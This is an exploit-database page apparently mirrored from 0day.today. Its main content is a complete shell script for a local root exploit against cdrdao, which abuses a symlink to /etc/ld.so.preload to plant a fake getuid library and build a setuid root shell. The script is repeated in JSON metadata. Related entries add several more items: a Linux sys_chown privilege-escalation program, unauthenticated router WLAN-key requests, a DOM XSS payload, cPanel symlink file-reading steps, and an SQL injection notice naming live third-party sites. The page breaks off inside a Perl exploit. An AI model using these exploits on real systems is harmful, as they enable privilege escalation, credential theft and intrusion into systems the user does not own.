Search...

CDRDAO Local Root Exploit

2004-09-07T00:00:00

ID 1337DAY-ID-7357
Type zdt
Reporter Karol Wi?sek
Modified 2004-09-07T00:00:00

Description

Exploit for linux platform in category local exploits

                                        
                                            =========================
CDRDAO Local Root Exploit
=========================


#!/bin/sh
DIR=`pwd`
echo ""
echo "cdrdao local root exploit - gr doesn't protect you this time"
echo "Karol Wi?sek &lt;appelast*drumnbass.art.pl&gt;"
echo ""
sleep 2
umask 000
echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "
if [ -f /etc/ld.so.preload ]; then
echo "WRONG"
echo "/etc/ld.so.preload exists, write another exploit ;P"
exit
else
echo "OK"
fi
echo -n "[*] Checking if su is setuid ... "
if [ -u /bin/su ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Creating evil *uid() library ... "
cat &gt; getuid_lib.c &lt;&lt; _EOF
int getuid(void) {
return 0; }
_EOF
gcc -o getuid_lib.o -c getuid_lib.c
ld -shared -o getuid_lib.so getuid_lib.o
rm -f getuid_lib.c getuid_lib.o
if [ -f ./getuid_lib.so ]; then
echo "OK"
else
echo "WRONG"
fi
echo -n "[*] Creating suidshell ... "
cat &gt; suid.c &lt;&lt; _EOF
int main(void) {
setgid(0); setuid(0);
unlink("./suid");
execl("/bin/sh","sh",0); }
_EOF
gcc -o suid suid.c
rm -f suid.c
if [ -x ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Exploiting cdrdao ... "
ln -sf /etc/ld.so.preload $HOME/.cdrdao
if [ ! -L $HOME/.cdrdao ];then
echo "Could'n link to \$HOME/.cdrdao"
exit
fi
cdrdao unlock --save 2&gt;/dev/null
&gt;/etc/ld.so.preload
echo "$DIR/getuid_lib.so" &gt; /etc/ld.so.preload
su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
if [ -s ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
rm -f getuid_lib.so
unlink $HOME/.cdrdao
echo "Entering rootshell ... ;]"
./suid



#  0day.today [2018-01-26]  #

JSON Vulners Source

Initial Source

{"hash": "5450a8f8c003286b0fa085f58126cc59ffbaf7c651ba590e7b6ea10d0986f589", "id": "1337DAY-ID-7357", "lastseen": "2018-01-27T01:08:57", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "17e38fa0b0ca304d86a8a97a8db36bac", "key": "href"}, {"hash": "463841cc7f3a0242064cda0bcbdba264", "key": "modified"}, {"hash": "463841cc7f3a0242064cda0bcbdba264", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "209c62cb173595573aa456a38f5c0ae1", "key": "reporter"}, {"hash": "43c1bf2e8e06ce31e1d717dc92daad4f", "key": "sourceData"}, {"hash": "500127373934cfea5570eeeaa7d42b6c", "key": "sourceHref"}, {"hash": "a1f0afbae1be501699ace9d4e2b3c8ad", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-01-27T01:08:57"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31756", "1337DAY-ID-27602", "1337DAY-ID-26266", "1337DAY-ID-24373", "1337DAY-ID-16304", "1337DAY-ID-16276", "1337DAY-ID-13736", "1337DAY-ID-13737", "1337DAY-ID-13066", "1337DAY-ID-12511"]}, {"type": "openvas", "idList": ["OPENVAS:54623"]}, {"type": "seebug", "idList": ["SSV:9101"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7357"]}], "modified": "2018-01-27T01:08:57"}, "vulnersScore": 0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7357", "description": "Exploit for linux platform in category local exploits", "title": "CDRDAO Local Root Exploit", "history": [{"bulletin": {"hash": "71f8f46e3305ba766adc93276821c1fabce50da3bb0a347f8f1e3f424d346ba0", "id": "1337DAY-ID-7357", "lastseen": "2016-04-20T00:39:57", "enchantments": {"score": {"value": 1.9, "modified": "2016-04-20T00:39:57"}}, "hashmap": [{"hash": "46eacc4ef1b77f0b9c1c401cb959032d", "key": "href"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "463841cc7f3a0242064cda0bcbdba264", "key": "published"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "209c62cb173595573aa456a38f5c0ae1", "key": "reporter"}, {"hash": "a1f0afbae1be501699ace9d4e2b3c8ad", "key": "title"}, {"hash": "7362690d81caef0e62a94beaadefdaf9", "key": "sourceHref"}, {"hash": "463841cc7f3a0242064cda0bcbdba264", "key": "modified"}, {"hash": "e0edbe12d47e1a778d3841d053230e72", "key": "sourceData"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7357", "description": "Exploit for linux platform in category local exploits", "viewCount": 2, "title": "CDRDAO Local Root Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=========================\r\nCDRDAO Local Root Exploit\r\n=========================\r\n\r\n\r\n#!/bin/sh\r\nDIR=`pwd`\r\necho \"\"\r\necho \"cdrdao local root exploit - gr doesn't protect you this time\"\r\necho \"Karol Wi?sek <appelast*drumnbass.art.pl>\"\r\necho \"\"\r\nsleep 2\r\numask 000\r\necho -n \"[*] Checking if /etc/ld.so.preload doesn't exist ... \"\r\nif [ -f /etc/ld.so.preload ]; then\r\necho \"WRONG\"\r\necho \"/etc/ld.so.preload exists, write another exploit ;P\"\r\nexit\r\nelse\r\necho \"OK\"\r\nfi\r\necho -n \"[*] Checking if su is setuid ... \"\r\nif [ -u /bin/su ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Creating evil *uid() library ... \"\r\ncat > getuid_lib.c << _EOF\r\nint getuid(void) {\r\nreturn 0; }\r\n_EOF\r\ngcc -o getuid_lib.o -c getuid_lib.c\r\nld -shared -o getuid_lib.so getuid_lib.o\r\nrm -f getuid_lib.c getuid_lib.o\r\nif [ -f ./getuid_lib.so ]; then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nfi\r\necho -n \"[*] Creating suidshell ... \"\r\ncat > suid.c << _EOF\r\nint main(void) {\r\nsetgid(0); setuid(0);\r\nunlink(\"./suid\");\r\nexecl(\"/bin/sh\",\"sh\",0); }\r\n_EOF\r\ngcc -o suid suid.c\r\nrm -f suid.c\r\nif [ -x ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Exploiting cdrdao ... \"\r\nln -sf /etc/ld.so.preload $HOME/.cdrdao\r\nif [ ! -L $HOME/.cdrdao ];then\r\necho \"Could'n link to \\$HOME/.cdrdao\"\r\nexit\r\nfi\r\ncdrdao unlock --save 2>/dev/null\r\n>/etc/ld.so.preload\r\necho \"$DIR/getuid_lib.so\" > /etc/ld.so.preload\r\nsu - -c \"rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid\"\r\nif [ -s ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\nrm -f getuid_lib.so\r\nunlink $HOME/.cdrdao\r\necho \"Entering rootshell ... ;]\"\r\n./suid\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2004-09-07T00:00:00", "references": [], "reporter": "Karol Wi?sek", "modified": "2004-09-07T00:00:00", "href": "http://0day.today/exploit/description/7357"}, "lastseen": "2016-04-20T00:39:57", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=========================\r\nCDRDAO Local Root Exploit\r\n=========================\r\n\r\n\r\n#!/bin/sh\r\nDIR=`pwd`\r\necho \"\"\r\necho \"cdrdao local root exploit - gr doesn't protect you this time\"\r\necho \"Karol Wi?sek <appelast*drumnbass.art.pl>\"\r\necho \"\"\r\nsleep 2\r\numask 000\r\necho -n \"[*] Checking if /etc/ld.so.preload doesn't exist ... \"\r\nif [ -f /etc/ld.so.preload ]; then\r\necho \"WRONG\"\r\necho \"/etc/ld.so.preload exists, write another exploit ;P\"\r\nexit\r\nelse\r\necho \"OK\"\r\nfi\r\necho -n \"[*] Checking if su is setuid ... \"\r\nif [ -u /bin/su ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Creating evil *uid() library ... \"\r\ncat > getuid_lib.c << _EOF\r\nint getuid(void) {\r\nreturn 0; }\r\n_EOF\r\ngcc -o getuid_lib.o -c getuid_lib.c\r\nld -shared -o getuid_lib.so getuid_lib.o\r\nrm -f getuid_lib.c getuid_lib.o\r\nif [ -f ./getuid_lib.so ]; then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nfi\r\necho -n \"[*] Creating suidshell ... \"\r\ncat > suid.c << _EOF\r\nint main(void) {\r\nsetgid(0); setuid(0);\r\nunlink(\"./suid\");\r\nexecl(\"/bin/sh\",\"sh\",0); }\r\n_EOF\r\ngcc -o suid suid.c\r\nrm -f suid.c\r\nif [ -x ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\necho -n \"[*] Exploiting cdrdao ... \"\r\nln -sf /etc/ld.so.preload $HOME/.cdrdao\r\nif [ ! -L $HOME/.cdrdao ];then\r\necho \"Could'n link to \\$HOME/.cdrdao\"\r\nexit\r\nfi\r\ncdrdao unlock --save 2>/dev/null\r\n>/etc/ld.so.preload\r\necho \"$DIR/getuid_lib.so\" > /etc/ld.so.preload\r\nsu - -c \"rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid\"\r\nif [ -s ./suid ];then\r\necho \"OK\"\r\nelse\r\necho \"WRONG\"\r\nexit\r\nfi\r\nrm -f getuid_lib.so\r\nunlink $HOME/.cdrdao\r\necho \"Entering rootshell ... ;]\"\r\n./suid\r\n\r\n\r\n\n# 0day.today [2018-01-26] #", "published": "2004-09-07T00:00:00", "references": [], "reporter": "Karol Wi?sek", "modified": "2004-09-07T00:00:00", "href": "https://0day.today/exploit/description/7357"}

{"zdt": [{"lastseen": "2018-12-12T07:55:38", "bulletinFamily": "exploit", "description": "ZTE Home Gateway ZXHN H168N suffers from multiple access bypass and information disclosure vulnerabilities.", "modified": "2018-12-11T00:00:00", "published": "2018-12-11T00:00:00", "id": "1337DAY-ID-31756", "href": "https://0day.today/exploit/description/31756", "title": "ZTE Home Gateway ZXHN H168N 2.2 Access Control Bypass Vulnerability", "type": "zdt", "sourceData": "[*] POC: (CVE-2018-7357 and CVE-2018-7358)\r\n\r\nDisclaimer: [This POC is for Educational Purposes , I would Not be\r\n\r\n\r\nresponsible for any misuse of the information mentioned in this blog post]\r\n\r\n[+] Unauthenticated\r\n\r\n[+] Author: Usman Saeed (usman [at] xc0re.net)\r\n\r\n[+] Protocol: UPnP\r\n\r\n[+] Affected Harware/Software:\r\n\r\nModel name: ZXHN H168N v2.2\r\n\r\nBuild Timestamp: 20171127193202\r\n\r\nSoftware Version: V2.2.0_PK1.2T5\r\n\r\n[+] Findings:\r\n\r\n1. Unauthenticated access to WLAN password:\r\n\r\n\r\nPOST /control/igd/wlanc_1_1 HTTP/1.1\r\n\r\nHost: <IP>:52869\r\n\r\nUser-Agent: {omitted}\r\n\r\nContent-Length: 288\r\n\r\nConnection: close\r\n\r\nContent-Type: text/xml; charset=\"utf-8\"\r\n\r\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys\" 1\r\n\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n\r\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"></u:GetSecurityKeys></s:Body></s:Envelope>\r\n\r\n\r\n2. Unauthenticated WLAN passphrase change:\r\n\r\nPOST /control/igd/wlanc_1_1 HTTP/1.1\r\n\r\nHost: <IP>:52869\r\n\r\nUser-Agent: {omitted}\r\n\r\nContent-Length: 496\r\n\r\nConnection: close\r\n\r\nContent-Type: text/xml; charset=\"utf-8\"\r\n\r\nSOAPACTION: \"urn:dslforum-org:service:WLANConfiguration:1#SetSecurityKeys\"\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n\r\n\r\n<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:SetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\"><NewWEPKey0>{omitted}</NewWEPKey0><NewWEPKey1>{omitted}</NewWEPKey1><NewWEPKey2>{omitted}</NewWEPKey2><NewWEPKey3>{omitted}</NewWEPKey3><NewPreSharedKey>{omitted}</NewPreSharedKey><NewKeyPassphrase>{omitted}</NewKeyPassphrase></u:SetSecurityKeys></s:Body></s:Envelope>\r\n\r\n\r\n[*] Solution:\r\n\r\n\r\nUPnP should not provide excessive services, and if the fix is not possible, then UPnP should be disabled on the affected devices.\r\n\r\n\r\n[*] Note:\r\n\r\nThere are other services which should not be published over UPnP, which are not mentioned in this blog post, as the solution is the same.\r\n\r\n[+] Responsible Disclosure:\r\n\r\nVulnerabilities identified - 20 August, 2018\r\n\r\nReported to ZTE - 28 August, 2018\r\n\r\nZTE official statement - 17 September 2018\r\n\r\nZTE patched the vulnerability - 12 November 2018\r\n\r\nThe operator pushed the update - 12 November 2018\r\n\r\nCVE published - CVE- 2018-7357 and CVE-2018-7358\r\n\r\nPublic disclosure - 12 November 2018\r\n\r\nRef: http://support.zte.com.cn/support/news/LoopholeInfoDetail.aspx?newsId=1009522\n\n# 0day.today [2018-12-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31756"}, {"lastseen": "2018-03-12T17:05:20", "bulletinFamily": "exploit", "description": "Hipchat server versions prior to 2.2.3 suffer from a remote code execution vulnerability that can be leveraged via Administrative Imports.", "modified": "2017-04-14T00:00:00", "published": "2017-04-14T00:00:00", "href": "https://0day.today/exploit/description/27602", "id": "1337DAY-ID-27602", "type": "zdt", "title": "Hipchat Remote Code Execution Vulnerability", "sourceData": "CVE ID:\r\n\r\n* CVE-2017-7357.\r\n\r\n\r\nProduct: Hipchat Server.\r\n\r\nAffected Hipchat Server product versions:\r\nAll versions < 2.2.3\r\n\r\n\r\nFixed Hipchat Server product versions:\r\n2.2.3\r\n\r\n\r\n\r\nSummary:\r\nThis advisory discloses a critical severity security vulnerability\r\nthat was introduced in version 1.0 of Hipchat Server. Versions of\r\nHipchat Server starting with versions of Hipchat Server from 1.0 but\r\nless than 2.2.3 (the fixed version), are affected by this\r\nvulnerability. are affected by this vulnerability.\r\n\r\nHipChat Cloud instances aren't affected by the issue described in this email.\r\n\r\nCustomers who have upgraded Hipchat Server to version 2.2.3 are not affected.\r\n\r\nCustomers who have downloaded and installed any version less than\r\n2.2.3 please upgrade your Hipchat Server installations immediately to\r\nfix this vulnerability.\r\n\r\n\r\nRemote Code Execution via Administrative Imports (CVE-2017-7357)\r\n\r\nSeverity:\r\nAtlassian rates the severity level of this vulnerability as critical,\r\naccording to the scale published in our Atlassian severity levels. The\r\nscale allows us to rank the severity as critical, high, moderate or\r\nlow.\r\nThis is an independent assessment and you should evaluate its\r\napplicability to your own IT environment.\r\n\r\n\r\nDescription:\r\n\r\nAn attacker with Server Administrator level privileges could gain\r\nRemote Code Execution via a malicious file importation.\r\nAll versions of Hipchat Server starting with versions of Hipchat\r\nServer from 1.0 but less than 2.2.3 (the fixed version), are affected\r\nby this vulnerability. are affected by this vulnerability. are\r\naffected by this vulnerability. This issue can be tracked at:\r\nhttps://jira.atlassian.com/browse/HCPUB-2903 .\r\n\r\n\r\nFix:\r\n\r\nTo address this issue, we've released the following versions containing a fix:\r\n\r\n* Hipchat Server version 2.2.3\r\n\r\nRemediation:\r\n\r\nUpgrade Hipchat Server to version 2.2.3 or higher.\r\n\r\nThe vulnerabilities and fix versions are described above. If affected,\r\nyou should upgrade to the latest version immediately.\r\n\r\n\r\n\r\n\r\nFor a full description of the latest version of Hipchat Server, see\r\nthe release notes found at\r\nhttps://confluence.atlassian.com/display/hc/hipchat+server+Release+Notes.\r\nYou can download the latest version of Hipchat Server from the\r\ndownload centre found at https://www.hipchat.com/server/get-it.\n\n# 0day.today [2018-03-12] #", "sourceHref": "https://0day.today/exploit/27602", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-02-09T07:16:27", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2016-11-08T00:00:00", "published": "2016-11-08T00:00:00", "href": "https://0day.today/exploit/description/26266", "id": "1337DAY-ID-26266", "title": "Linux Kernel 2.6.x < 2.6.7-rc3 - sys_chown() Privilege Escalation Exploit", "type": "zdt", "sourceData": "/*\r\n * $Id: raptor_chown.c,v 1.1 2004/12/04 14:44:38 raptor Exp $\r\n *\r\n * raptor_chown.c - sys_chown missing DAC controls on Linux\r\n * Copyright (c) 2004 Marco Ivaldi <[email\u00a0protected]>\r\n *\r\n * Unknown vulnerability in Linux kernel 2.x may allow local users to \r\n * modify the group ID of files, such as NFS exported files in kernel \r\n * 2.4 (CAN-2004-0497).\r\n *\r\n * \"Basically, you can change the group of a file you don't own, but not\r\n * of an SGID executable.\" -- Solar Designer (0dd)\r\n *\r\n * On Linux 2.6.x < 2.6.7-rc3 it's possible to change the group of files you \r\n * don't own, even on local filesystems. This may allow a local attacker to \r\n * perform a privilege escalation, e.g. through the following attack vectors:\r\n *\r\n * 1) Target /etc/shadow: on some distros (namely slackware 9.1 and debian\r\n * 3.0, probably others) the shadow group has read access to it.\r\n * 2) Target /dev/mem, /dev/kmem: read arbitrary memory contents.\r\n * 3) Target /dev/hd*, /dev/sd*: read arbitrary data stored on disks.\r\n * 4) Target /dev/tty*, /dev/pts*: snoop/execute arbitrary commands.\r\n *\r\n * Usage:\r\n * $ gcc raptor_chown.c -o raptor_chown -Wall\r\n * $ ./raptor_chown /etc/shadow\r\n * [...]\r\n * -rw-r----- 1 root users 500 Mar 25 12:27 /etc/shadow\r\n *\r\n * Vulnerable platforms:\r\n * Linux 2.2.x (on nfs exported files, should be vuln) [untested]\r\n * Linux 2.4.x < 2.4.27-rc3 (on nfs exported files) [tested]\r\n * Linux 2.6.x < 2.6.7-rc3 (default configuration) [tested]\r\n */\r\n \r\n#include <errno.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <sys/types.h>\r\n \r\n#define INFO1 \"raptor_chown.c - sys_chown missing DAC controls on Linux\"\r\n#define INFO2 \"Copyright (c) 2004 Marco Ivaldi <[email\u00a0protected]>\"\r\n \r\nint main(int argc, char **argv)\r\n{\r\n char cmd[256];\r\n \r\n /* print exploit information */\r\n fprintf(stderr, \"%s\\n%s\\n\\n\", INFO1, INFO2);\r\n \r\n /* read command line */\r\n if (argc != 2) {\r\n fprintf(stderr, \"usage: %s file_name\\n\\n\", argv[0]);\r\n exit(1);\r\n }\r\n \r\n /* ninpou: sys_chown no jutsu! */\r\n if (chown(argv[1], -1, getgid()) < 0) {\r\n switch(errno) {\r\n case EPERM:\r\n fprintf(stderr, \"Error: Not vulnerable!\\n\");\r\n break;\r\n default:\r\n perror(\"Error\");\r\n }\r\n exit(1);\r\n }\r\n fprintf(stderr, \"Ninpou: sys_chown no jutsu!\\n\");\r\n \r\n /* print some output */\r\n sprintf(cmd, \"/bin/ls -l %s\", argv[1]);\r\n system(cmd);\r\n \r\n exit(0);\r\n}\n\n# 0day.today [2018-02-09] #", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/26266"}, {"lastseen": "2018-04-02T19:33:06", "bulletinFamily": "exploit", "description": "WordPress U-Design theme versions 2.3.0 through 2.7.9 suffer from a cross site scripting vulnerability.", "modified": "2015-10-06T00:00:00", "published": "2015-10-06T00:00:00", "id": "1337DAY-ID-24373", "href": "https://0day.today/exploit/description/24373", "type": "zdt", "title": "WordPress U-Design Theme 2.7.9 Cross Site Scripting Vulnerability", "sourceData": "u-desing is a wordpress theme prone to DOM XSS vulnerability.\r\n\r\nVendor url:\r\nhttp://themeforest.net/item/udesign-responsive-wordpress-theme/253220\r\n\r\nversions between 2.7.9 \u2013 (Updated: 08.05.2015) and 2.3.0 \u2013 (Updated:\r\n04.02.2014 - there are 40 of them) are vulnerable to DOM XSS which can be\r\nexploited by adding #<svg onload=alert(1)> to the end of the url.\r\n\r\nVendor already patched the vulnerability on higher versions, but there are\r\nstill a lot of people/companies are using vulnerable ones.\r\n\r\nDork: inurl:/wp-theme/u-design/\r\nYou can check the version from: /wp-content/themes/u-design/style.css\r\nCVE Reference: CVE-2015-7357\r\nAuthor: @K3n4nG\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://0day.today/exploit/24373"}, {"lastseen": "2018-01-01T09:12:36", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-06-11T00:00:00", "published": "2011-06-11T00:00:00", "id": "1337DAY-ID-16304", "href": "https://0day.today/exploit/description/16304", "type": "zdt", "title": "cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass", "sourceData": "# cPanel X / WHM 11.30.0 (build 27) Read Files / Symlinks Bypass !!\r\n# Version : 11.30.0 <Build 27>\r\n# Author : ZxH-Labs\r\n# Date : 1st OF Jun 2011\r\n# Tested On CentOS \r\n# Software Link : http://www.cpanel.net\r\n# Home: 1337day.com Inj3ct0r Exploit DataBase\r\n\r\n[+] Exploiting cPanel x .... \r\n\r\nAt First , You Must've Reseller Account < Note : We'll Not Need To 2086 Port :)\r\nOkay Now Open SSH or File Manager Then Go to\r\n \r\n /home/user/cpanelbranding/x3\r\n\r\n\r\nNote : You Can Change x3 Template To Template That You're Running \r\nOkay Now Exeute This Command To Delete File And Make Symlink To read it \r\n\r\n# 0x01 : [email\u00a0protected] [~/cpanelbranding/x3]# rm ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : [email\u00a0protected] [~/cpanelbranding/x3]# ln -s /etc/passwd ui_sprites_bg_snap_to_smallest_width.png\r\n\r\nThe Second Will Work Successfuly Without Any Problem'z !\r\nOkay .. Now If You Want to Read Another File .. So You've To Check Files If You can Read it or No \r\nSo .. Execute This Command :\r\n\r\n# 0x021 : [email\u00a0protected] [~/]# ls -dl /home/*/public_html/ | grep drwxr-xr-x\r\n\r\nYou'll Get Some Path'z .. So You Can Read it Easily \r\n\r\n# 0x03 : [email\u00a0protected] [~/cpanelbranding/x3]# ln -s /home/user/public_html/wp-config.php sprites_bg_snap_to_smallest_width.png\r\nNote : /home/user/public_html Must be Chmoded 755 / drwxr-xr-x\r\n\r\n[+] Reading Data From cPanel X ...\r\n\r\nOkay .. We've Finished The First Part .. Now We Want To Read Files / Symlinks !\r\nOkay Now Go 2 cPanel X \r\n\r\n# 0x01 : http://domain.com/net/..etc:2082\r\n# 0x02 : http://ip:2082\r\n# 0x03 : https://domain.com/net/..etc:2082\r\n# 0x04 : https://ip:2082\r\n\r\nNow Show Source And Search About \"ui_sprites_bg_snap_to_smallest_width.png\" \r\nYou'll See This\r\n\"(\"/cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\");}#ui-aqua-hd-bg{background-position:\"\r\nNow Add The Path To Your cPanel To Get File\r\n\r\n[+] Full Exploit of cPanel X ...\r\n\r\nNow You'll Open This Link\r\n\r\n# 0x01 : http://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x02 : http://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x03 : https://domain.com/net/..etc:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n# 0x04 : https://ip:2082//cPanel_magic_revision_17975625280.1848/branding/x3/ui_sprites_bg_snap_to_smallest_width.png\r\n\r\n\r\n[+] Note For All \r\n\r\nWe All Have More And More exploits For cPanel X But I Want You 2 Know That All exploit'z Will Not bypass Forbidden .. Only if file has 755 Permission \r\nHowever I Hate Lamer'z :) .. Especially Saudi'z Lamer'z !\r\n\r\n./b0x-j0\r\n\r\n[+] Greet'z 2 All Friend'z and 1337day.com (Inj3ct0r Team)\r\n\r\n\n\n# 0day.today [2018-01-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16304"}, {"lastseen": "2018-04-01T21:24:04", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-06-07T00:00:00", "published": "2011-06-07T00:00:00", "id": "1337DAY-ID-16276", "href": "https://0day.today/exploit/description/16276", "type": "zdt", "title": "AR Infotech SQL Injection Vulnerability", "sourceData": "[----]\r\n\r\n/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-\r\n\\-/ --------------------------------|-------------------------------------------------------|\r\n\\-/ [+] Exploit Title : AR Infotech SQL injection Vulnerability | \r\n\\-/ [+] Date : 07 June 2011 |\r\n\\-/ [+] Author : xConsoLe` |\r\n\\-/ [+] Category : WebApps |\r\n\\-/ [+] d0rk : \"Website Developed By: AR Infotech.\" inurl:productsearch.php?cid= |\r\n\\-/ [+] Home : http://dzt00ls.tk/ Or http://dztools.net/ |\r\n\\-/ [+] Tested on : Windows Xp SP3 |\r\n\\-/ ------------------------|---------------------------------------------------------------|\r\n/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-/\\\\-\r\n\r\n\r\n ( ) /\\ _ (\r\n \\ | ( \\ ( \\.( ) _____\r\n \\ \\ \\ ` ` ) \\ ( ___ / _ \\\r\n (_` \\+ . x ( .\\ \\/ \\____-----------/ (o) \\_\r\n- .- \\+ ; ( O \\____\r\n Dz 4 \t ) \\_____________ ` \\ /\r\n(__ Ever <3 +- .( -'.- <. - _ VVVVVVV VV V\\ \\/\r\n(_____ ._._: <_ - <- _ (-- _AAAAAAA__A_/ |\r\n . /./.+- . .- / +-- - . \\______________//_ \\_______\r\n (__ ' /x / x _/ ( \\___' \\ /\r\n , x / ( ' . / . / | \\ /\r\n / / _/ / + / \\/\r\n ' (__/ / \\\r\n\r\n \r\n[+] \r\n\r\n[+] Vulnerable Code : \r\n\r\nhttp://localhost/productsearch.php?cid=X\r\n\r\nhttp://localhost/productsearch.php?cid=X'\r\n\r\nhttp://localhost/productsearch.php?cid=[SQLi]\r\n\r\n\r\n[+] Live Demo ;\r\n\r\n[+] http://sumitgems.com/productsearch.php?cid=83'\r\n[+] http://indianhandicraftsonline.net/productsearch.php?cid=1'\r\n[+] http://www.beadpalaceinc.com/productsearch.php?cid=58'\r\n[+] http://royalcanada.ca/productsearch.php?cid=1'\r\n\r\n[+] Done ;D\r\n\r\n[+] Greetz t0 ; My Friends ; Ukn0wnv1rus , Dfpirate , J|nX , alb0wz , XeN` ( GL <3 ) , mohsan123 , & All who i Forgot ;D .\r\n\r\n[+] Proud To Be Algerian [Dz 4 Ever]\r\n\r\n[+] Peace & Love ! .\r\n\r\n[----]\r\n\r\n\n\n# 0day.today [2018-04-01] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16276"}, {"lastseen": "2018-03-03T03:40:35", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-08-18T00:00:00", "published": "2010-08-18T00:00:00", "id": "1337DAY-ID-13737", "href": "https://0day.today/exploit/description/13737", "type": "zdt", "title": "Vural Portal 2010 Remote Database Disclosure Exploit", "sourceData": "====================================================\r\nVural Portal 2010 Remote Database Disclosure Exploit\r\n====================================================\r\n\r\n\r\nAuthor : KnocKout\r\nScript : Vural Portal\r\nVersion : 2010\r\nDownload : http://aspindir.com/goster/6070\r\n\r\n========================================================\r\nVural Portal 2010 Remote Database Disclosure Exploit\r\n========================================================\r\n\r\n\r\n#!/usr/bin/perl -w\r\n#\r\n# Vural Portal 2010 / Database Disclosure Exploit\r\n#\r\n# Coded: KnocKout\r\n# \r\n#\r\n# Date: 25/07/2010\r\n#\r\n#\r\n# Thanks: DaiMon, BARCOD3\r\n#\r\n 